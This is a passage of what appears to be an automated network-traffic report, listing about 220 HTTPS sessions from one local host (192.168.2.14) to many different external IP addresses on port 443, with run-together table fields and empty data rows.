                                      12553192.168.2.144475464.132.45.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12554192.168.2.144451825.149.104.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12555192.168.2.1448600146.170.135.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12556192.168.2.1455842212.39.82.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12557192.168.2.1451948146.165.204.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12558192.168.2.1460092171.127.16.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12559192.168.2.1458856218.233.74.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12560192.168.2.144927635.52.17.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12561192.168.2.1443240166.21.217.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12562192.168.2.144940685.225.151.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12563192.168.2.1438246119.9.124.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12564192.168.2.145368663.38.63.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12565192.168.2.145656864.245.54.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12566192.168.2.145744498.137.53.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12567192.168.2.1437840153.217.5.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12568192.168.2.145744878.240.163.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12569192.168.2.1458820182.253.124.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12570192.168.2.1445638207.164.99.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12571192.168.2.1454640217.150.162.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12572192.168.2.143522492.255.26.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12573192.168.2.1439380183.111.9.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12574192.168.2.1452904116.244.12.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12575192.168.2.1438526161.118.104.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12576192.168.2.1435612205.196.24.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12577192.168.2.1459916209.3.41.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12578192.168.2.1440308180.34.128.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12579192.168.2.1451966201.183.95.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12580192.168.2.143799280.158.255.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12581192.168.2.145980269.76.9.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12582192.168.2.1438892146.54.182.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12583192.168.2.1446102105.98.189.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12584192.168.2.145927072.121.227.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12585192.168.2.1437034132.120.15.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12586192.168.2.1451226106.132.121.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12587192.168.2.1437930180.151.97.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12588192.168.2.145202450.154.199.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12589192.168.2.145818247.40.100.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12590192.168.2.1439744208.148.214.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12591192.168.2.144130271.213.99.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12592192.168.2.1442928126.164.72.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12593192.168.2.1448550216.142.101.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12594192.168.2.144499444.131.16.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12595192.168.2.1442396118.210.183.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12596192.168.2.143515272.70.88.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12597192.168.2.145256246.29.103.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12598192.168.2.144744617.6.214.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12599192.168.2.145687258.83.56.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12600192.168.2.1459046101.229.130.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12601192.168.2.144498064.109.235.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12602192.168.2.14597444.174.210.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12603192.168.2.144596665.209.146.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12604192.168.2.1449440179.145.38.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12605192.168.2.144391044.204.77.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12606192.168.2.144367499.249.153.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12607192.168.2.1444802156.188.150.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12608192.168.2.143333868.62.210.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12609192.168.2.1456706221.71.119.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12610192.168.2.1459556150.224.50.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12611192.168.2.1441392164.116.119.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12612192.168.2.143826286.235.97.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12613192.168.2.1436652200.57.131.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12614192.168.2.14334144.72.239.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12615192.168.2.145480451.248.138.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12616192.168.2.145226853.255.61.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12617192.168.2.1440588207.129.168.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12618192.168.2.1450138118.28.221.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12619192.168.2.1457514134.75.38.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12620192.168.2.1459966193.69.80.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12621192.168.2.1456056185.196.208.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12622192.168.2.1440826171.211.92.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12623192.168.2.145196631.92.7.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12624192.168.2.1450474103.141.89.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12625192.168.2.144359025.8.10.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12626192.168.2.1443542165.228.235.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12627192.168.2.145075843.67.99.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12628192.168.2.1456634113.143.86.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12629192.168.2.1454664195.159.106.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12630192.168.2.1452014211.45.105.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12631192.168.2.1442622101.173.43.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12632192.168.2.1450478108.144.118.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12633192.168.2.1445928166.76.88.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12634192.168.2.1437308204.37.239.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12635192.168.2.1435922205.26.89.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12636192.168.2.144768465.65.169.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12637192.168.2.144720424.139.42.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12638192.168.2.1452174223.123.7.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12639192.168.2.1437394138.250.125.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12640192.168.2.1447192188.18.230.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12641192.168.2.1457374137.52.150.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12642192.168.2.1433994131.48.74.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12643192.168.2.146058843.121.243.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12644192.168.2.145245695.160.61.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12645192.168.2.1452598123.121.128.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12646192.168.2.1457224112.93.235.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12647192.168.2.145034048.179.251.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12648192.168.2.145791232.144.183.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12649192.168.2.1445034207.227.97.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12650192.168.2.1455360174.14.202.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12651192.168.2.1448712148.103.245.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12652192.168.2.1435376165.50.170.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12653192.168.2.144891048.59.179.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12654192.168.2.1447800174.156.179.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12655192.168.2.143751864.219.236.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12656192.168.2.1457254131.240.116.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12657192.168.2.1433166188.155.8.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12658192.168.2.1442626209.107.217.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12659192.168.2.1457018139.109.2.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12660192.168.2.143452067.69.7.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12661192.168.2.143732817.220.104.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12662192.168.2.14535449.146.236.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12663192.168.2.144531420.95.6.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12664192.168.2.1456842145.243.25.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12665192.168.2.14408785.188.237.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12666192.168.2.144560838.168.110.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12667192.168.2.1436590199.251.43.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12668192.168.2.1451314111.243.45.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12669192.168.2.1438800149.141.45.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12670192.168.2.1449652122.130.19.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12671192.168.2.145997893.214.81.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12672192.168.2.1457082130.158.162.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12673192.168.2.143630689.5.230.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12674192.168.2.1435228204.229.189.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12675192.168.2.145399853.30.33.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12676192.168.2.144241866.15.187.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12677192.168.2.145309418.142.147.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12678192.168.2.145060041.235.77.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12679192.168.2.144426467.59.125.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12680192.168.2.1440002211.105.144.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12681192.168.2.1436580213.193.170.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12682192.168.2.14431721.239.69.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12683192.168.2.145077485.121.19.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12684192.168.2.144936245.217.13.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12685192.168.2.143674857.218.208.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12686192.168.2.1440780188.11.55.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12687192.168.2.1441186158.84.2.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12688192.168.2.1452230188.99.142.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12689192.168.2.1449940192.204.26.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12690192.168.2.145226865.217.114.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12691192.168.2.145233292.179.120.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12692192.168.2.1433050101.80.120.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12693192.168.2.1446232189.2.213.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12694192.168.2.1454256149.10.238.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12695192.168.2.1447652104.17.22.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12696192.168.2.145821434.252.131.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12697192.168.2.1455466151.198.230.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12698192.168.2.144194666.25.239.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12699192.168.2.144013085.192.59.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12700192.168.2.1453802190.243.59.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12701192.168.2.145711271.124.86.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12702192.168.2.1439344213.117.136.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12703192.168.2.1448956219.186.41.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12704192.168.2.1434034159.164.2.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12705192.168.2.1439374172.231.248.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12706192.168.2.143683214.80.97.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12707192.168.2.1455578162.174.48.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12708192.168.2.1437608197.184.92.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12709192.168.2.144497457.31.55.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12710192.168.2.145454695.180.242.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12711192.168.2.1442752207.168.87.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12712192.168.2.143833832.87.254.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12713192.168.2.143492434.198.56.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12714192.168.2.1446286197.169.18.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12715192.168.2.1457568195.169.96.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12716192.168.2.145828089.87.241.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12717192.168.2.145451871.30.3.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12718192.168.2.1454872124.108.38.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12719192.168.2.1437030166.221.134.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12720192.168.2.145415838.40.170.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12721192.168.2.14467169.111.190.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12722192.168.2.1448010202.66.186.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12723192.168.2.1438864108.50.67.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12724192.168.2.145054850.132.128.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12725192.168.2.1433450170.121.100.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12726192.168.2.1433096202.185.47.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12727192.168.2.1458626101.12.3.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12728192.168.2.1449632186.20.74.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12729192.168.2.1433248149.149.127.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12730192.168.2.1441036155.86.211.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12731192.168.2.1438670118.142.25.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12732192.168.2.1433760179.56.129.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12733192.168.2.14337469.174.13.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12734192.168.2.145092648.44.95.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12735192.168.2.1447798199.114.83.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12736192.168.2.1449814220.252.55.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12737192.168.2.143648239.207.73.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12738192.168.2.1459862145.218.8.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12739192.168.2.1455984163.46.82.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12740192.168.2.1456406211.134.150.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12741192.168.2.1437278138.4.33.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12742192.168.2.145323851.230.88.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12743192.168.2.1435350115.51.117.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12744192.168.2.1439648112.28.51.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12745192.168.2.143598270.87.213.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12746192.168.2.144436869.60.177.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12747192.168.2.143794051.41.80.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12748192.168.2.144125052.152.40.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12749192.168.2.145577089.76.85.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12750192.168.2.1459612198.34.118.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12751192.168.2.144163877.159.248.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12752192.168.2.14367505.105.158.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12753192.168.2.1441990174.162.65.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12754192.168.2.144901895.227.183.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12755192.168.2.1435834156.12.209.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12756192.168.2.1440806176.105.1.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12757192.168.2.1433726202.24.12.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12758192.168.2.143957652.106.118.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12759192.168.2.144272054.147.187.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12760192.168.2.143326625.177.102.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12761192.168.2.144683488.122.254.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12762192.168.2.1434908129.101.114.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12763192.168.2.143830631.45.225.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12764192.168.2.144823862.117.245.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12765192.168.2.143611266.14.69.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12766192.168.2.1442308134.94.56.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12767192.168.2.144453018.195.127.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12768192.168.2.1451554118.180.179.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12769192.168.2.1436136212.62.30.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12770192.168.2.1454664139.72.43.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12771192.168.2.145992448.248.210.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12772192.168.2.1454046110.59.116.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12773192.168.2.14414302.233.76.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12774192.168.2.1459068217.37.39.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
